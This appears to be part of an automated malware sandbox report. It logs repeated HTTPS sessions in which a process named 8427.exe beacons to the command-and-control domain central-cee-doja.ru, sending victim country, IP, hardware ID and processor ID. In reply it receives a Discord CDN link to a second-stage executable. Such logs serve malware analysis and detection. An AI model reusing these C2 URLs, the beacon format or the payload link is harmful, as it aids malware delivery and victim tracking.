2023-11-18 09:03:40 UTC	10708	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:40 UTC	10708	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
81	104.21.89.193	443	192.168.2.4	49860	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:40 UTC	10708	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:41 UTC	10708	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MYW36kDRtMYDE%2FDSPcz1pxn6a2LwULrrUShb8Kpv5daDLfO%2Bv6IP6FhrjQOzqE%2BXcTaOMLW6JVoglAFeSjtCDjFynqNgVC2fp273i%2BeWd%2BIWq84IrWODjeTGuTjjWBNZSeaR9xV6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0aaa7a36090f-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:41 UTC	10709	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:41 UTC	10709	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
81	192.168.2.4	49860	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:40 UTC	10708	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:41 UTC	10708	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MYW36kDRtMYDE%2FDSPcz1pxn6a2LwULrrUShb8Kpv5daDLfO%2Bv6IP6FhrjQOzqE%2BXcTaOMLW6JVoglAFeSjtCDjFynqNgVC2fp273i%2BeWd%2BIWq84IrWODjeTGuTjjWBNZSeaR9xV6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0aaa7a36090f-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:41 UTC	10709	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:41 UTC	10709	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
82	192.168.2.4	49863	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:42 UTC	10709	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:43 UTC	10709	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1DJ6tUssQcpncE%2F3vCCrZ2WuwCJnEbDv34BmVc2U5Dy81G2TYCmxceollYrWfKWIi2%2FiBGYEBqkH9l3%2BZGFD6XfsH08sP0RMx%2BMHipLiQupHCPG0Z4VBV65vqhRhHIloMBnn1%2BmK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0ab24f62ec44-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:43 UTC	10709	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:43 UTC	10709	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
82	104.21.89.193	443	192.168.2.4	49863	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:42 UTC	10709	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:43 UTC	10709	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1DJ6tUssQcpncE%2F3vCCrZ2WuwCJnEbDv34BmVc2U5Dy81G2TYCmxceollYrWfKWIi2%2FiBGYEBqkH9l3%2BZGFD6XfsH08sP0RMx%2BMHipLiQupHCPG0Z4VBV65vqhRhHIloMBnn1%2BmK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0ab24f62ec44-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:43 UTC	10709	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:43 UTC	10709	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
83	104.21.89.193	443	192.168.2.4	49865	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:43 UTC	10709	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:44 UTC	10710	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BuwhhVh1BUUH%2FjZnZ%2BLwwNmDrDV8kiZSK6VDaKV8Zmv6GP6kqQ1uKpiup2unKsBLc%2Fiaj56Zf%2FdQ%2B3jRu%2BsPiP2Y2LhWUmXX8RSaK%2F4mmscTOT5rJ%2Fg6a4fwUGsZwq1ZDLpjdSS5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0ab96e57c6b5-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:44 UTC	10710	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:44 UTC	10710	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
83	192.168.2.4	49865	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:43 UTC	10709	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:44 UTC	10710	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BuwhhVh1BUUH%2FjZnZ%2BLwwNmDrDV8kiZSK6VDaKV8Zmv6GP6kqQ1uKpiup2unKsBLc%2Fiaj56Zf%2FdQ%2B3jRu%2BsPiP2Y2LhWUmXX8RSaK%2F4mmscTOT5rJ%2Fg6a4fwUGsZwq1ZDLpjdSS5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0ab96e57c6b5-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:44 UTC	10710	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:44 UTC	10710	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
84	192.168.2.4	49868	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:44 UTC	10710	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:03:45 UTC	10710	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=42Swu5pe3OCCvkplU%2Fg%2F1XAvglYjJmXcm3nKDSQEz3qUxOD1XB9WqHDzahRk%2B9oj1GqiLo4m3sNQzGCQUVxIEjkG4SXt85z2aoTBezjU7xt9%2Bdt8NMEzfRYGu0XhOPjw5zqoa4Da"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0ac18e38c3d7-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:45 UTC	10711	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:45 UTC	10711	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
84	104.21.89.193	443	192.168.2.4	49868	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:44 UTC	10710	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:03:45 UTC	10710	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=42Swu5pe3OCCvkplU%2Fg%2F1XAvglYjJmXcm3nKDSQEz3qUxOD1XB9WqHDzahRk%2B9oj1GqiLo4m3sNQzGCQUVxIEjkG4SXt85z2aoTBezjU7xt9%2Bdt8NMEzfRYGu0XhOPjw5zqoa4Da"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0ac18e38c3d7-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:45 UTC	10711	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:45 UTC	10711	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
85	192.168.2.4	6776	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:45 UTC	10711	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:46 UTC	10711	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=swHuSwiYA0HOO46o1iRQ69RzYI3uBPl6r%2BkOak%2BrinyRA4Wc9odI9dkLtcnMwx9qj7PWHVZwha4H%2BPs2vK5C%2BFifxEAZXxeGR3HKAC9RK5QQzY9fec7SEsEMX7no6iwI5RHhb8nG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0ac8cb9f16da-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:46 UTC	10712	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:46 UTC	10712	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
85	104.21.89.193	443	192.168.2.4	6776	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:45 UTC	10711	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:46 UTC	10711	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=swHuSwiYA0HOO46o1iRQ69RzYI3uBPl6r%2BkOak%2BrinyRA4Wc9odI9dkLtcnMwx9qj7PWHVZwha4H%2BPs2vK5C%2BFifxEAZXxeGR3HKAC9RK5QQzY9fec7SEsEMX7no6iwI5RHhb8nG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0ac8cb9f16da-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:46 UTC	10712	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:46 UTC	10712	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
86	192.168.2.4	49872	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:47 UTC	10712	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:03:47 UTC	10712	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QMmX%2F1y7lJRy7GylZo9wdMgMagwocmOwMmozO%2FOPKkPWmvS6w8gzV1cTye6a57pcKtS8p%2FWm7mEvI%2FZw3c42ICpsP%2FPt9Pt0e7ZacuMZn1dfUkTy2qC6ACaec2%2F2oW3rrGz0uTak"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0ad14b23c399-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:47 UTC	10713	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:47 UTC	10713	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
86	104.21.89.193	443	192.168.2.4	49872	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:47 UTC	10712	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:03:47 UTC	10712	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QMmX%2F1y7lJRy7GylZo9wdMgMagwocmOwMmozO%2FOPKkPWmvS6w8gzV1cTye6a57pcKtS8p%2FWm7mEvI%2FZw3c42ICpsP%2FPt9Pt0e7ZacuMZn1dfUkTy2qC6ACaec2%2F2oW3rrGz0uTak"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0ad14b23c399-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:47 UTC	10713	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:47 UTC	10713	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
87	192.168.2.4	49874	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:48 UTC	10713	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:49 UTC	10713	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Rufh4FOqnoAmH6CDBpjAbT0jneKW%2Bu4DARwLbYlKs%2FxUUKtWuwiK3X5ROItOvZK4CurnU5NJY7RSzfwoFkXmljhBmnoE0gCpKTR1aewaluekYkmmzXVtoEokDSc8b0XWI1nNGqE8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0ad88bb030bd-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:49 UTC	10713	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:49 UTC	10713	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
87	104.21.89.193	443	192.168.2.4	49874	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:48 UTC	10713	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:49 UTC	10713	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Rufh4FOqnoAmH6CDBpjAbT0jneKW%2Bu4DARwLbYlKs%2FxUUKtWuwiK3X5ROItOvZK4CurnU5NJY7RSzfwoFkXmljhBmnoE0gCpKTR1aewaluekYkmmzXVtoEokDSc8b0XWI1nNGqE8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0ad88bb030bd-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:49 UTC	10713	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:49 UTC	10713	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
88	104.21.89.193	443	192.168.2.4	49876	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:49 UTC	10713	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:50 UTC	10713	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=adioFizY5dvGzqLrrLo6i6P6PwyihQpQRvkCbvsTtJ0Ocn0JjWgYYotUMNtiZT%2B%2FTeavAru%2BmFaUf01dqZSZdHVXWIAPMlDnHBMhuHsttJQIa1b%2F%2FFHL2ux7yvDBSZ26Dk1W%2BZqi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0adfbacd7209-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:50 UTC	10714	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:50 UTC	10714	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
88	192.168.2.4	49876	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:49 UTC	10713	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:50 UTC	10713	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=adioFizY5dvGzqLrrLo6i6P6PwyihQpQRvkCbvsTtJ0Ocn0JjWgYYotUMNtiZT%2B%2FTeavAru%2BmFaUf01dqZSZdHVXWIAPMlDnHBMhuHsttJQIa1b%2F%2FFHL2ux7yvDBSZ26Dk1W%2BZqi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0adfbacd7209-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:50 UTC	10714	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:50 UTC	10714	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
89	192.168.2.4	49879	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:50 UTC	10714	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:51 UTC	10714	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eqr%2FAlB5UCEiqoVjy2zLgVpWl9vB0pBfCARKTYYXemrEi5jircc6tJtT1w2wNTIKYx6%2B0uo9vfOIgZ9RwikIrcKEpzJhTZQJQuWWTjH%2BficX2%2FXS5jgFTrdB%2F35%2BKOj6THXplvwJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0ae6eab730bf-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:51 UTC	10715	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:51 UTC	10715	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

